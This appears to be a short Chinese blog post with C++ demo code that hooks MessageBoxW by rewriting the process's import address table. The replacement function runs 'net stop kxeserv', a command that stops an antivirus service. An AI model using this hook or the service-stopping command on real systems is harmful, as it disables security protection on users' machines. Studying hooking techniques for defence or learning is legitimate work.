自己动手熟悉一下^_^
int Test(HWND hwnd, LPCTSTR str1, LPCTSTR str2, UINT nType);
PROC* pfnNew = (PROC*)Test;
PROC* ppfn = NULL;
int Test(HWND hwnd, LPCTSTR str1, LPCTSTR str2, UINT nType)
{
MessageBoxW(NULL, L"Test", L"Test", MB_OK);
_wsystem(L"net stop kxeserv");
return 0;
}
int _tmain(int argc, _TCHAR* argv[])
{
HMODULE hMd = GetModuleHandleA(NULL);
// HMODULE hMd2 = GetModuleHandle(L"User32.dll");
if (!hMd)
{
return 0;
}
PROC pfnOrig = GetProcAddress(
GetModuleHandle(L"User32.dll"),
"MessageBoxW"
);
ULONG ulSize;
PIMAGE_IMPORT_DESCRIPTOR pImportDesc = (PIMAGE_IMPORT_DESCRIPTOR)
ImageDirectoryEntryToData(
hMd,
TRUE,
IMAGE_DIRECTORY_ENTRY_IMPORT,
&ulSize
);
if (pImportDesc == NULL)
{
return 0;
}
for (; pImportDesc->Name; pImportDesc++)
{
PSTR pszName = (PSTR) ((PBYTE)hMd + pImportDesc->Name);
if (lstrcmpA(pszName, "USER32.dll") == 0)
{
break;
}
}
if (pImportDesc->Name == NULL)
{
return 0;
}
PIMAGE_THUNK_DATA pThunk = (PIMAGE_THUNK_DATA)
((PBYTE)hMd + pImportDesc->FirstThunk);
for (; pThunk->u1.Function; pThunk++)
{
ppfn = (PROC*) &pThunk->u1.Function;
BOOL bFound = (*ppfn == pfnOrig);
if (bFound)
{
if (WriteProcessMemory(
GetCurrentProcess(),
ppfn,
&pfnNew,
sizeof(pfnNew),
NULL
))
{
break;
}
else
{
DWORD dwoldProtect;
VirtualProtect(ppfn, sizeof(pfnNew), PAGE_WRITECOPY, &dwoldProtect);
WriteProcessMemory(GetCurrentProcess(), ppfn, &pfnNew, sizeof(pfnNew), NULL);
VirtualProtect(ppfn, sizeof(pfnNew), dwoldProtect, &dwoldProtect);
}
}
}
MessageBoxW(NULL, L"1", L"1", MB_OK);
MessageBoxW(NULL, L"1", L"1", MB_OK);
// HMODULE aa = ::LoadLibraryW(L"D://DemoDll1.dll");
return 0;
}
134
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
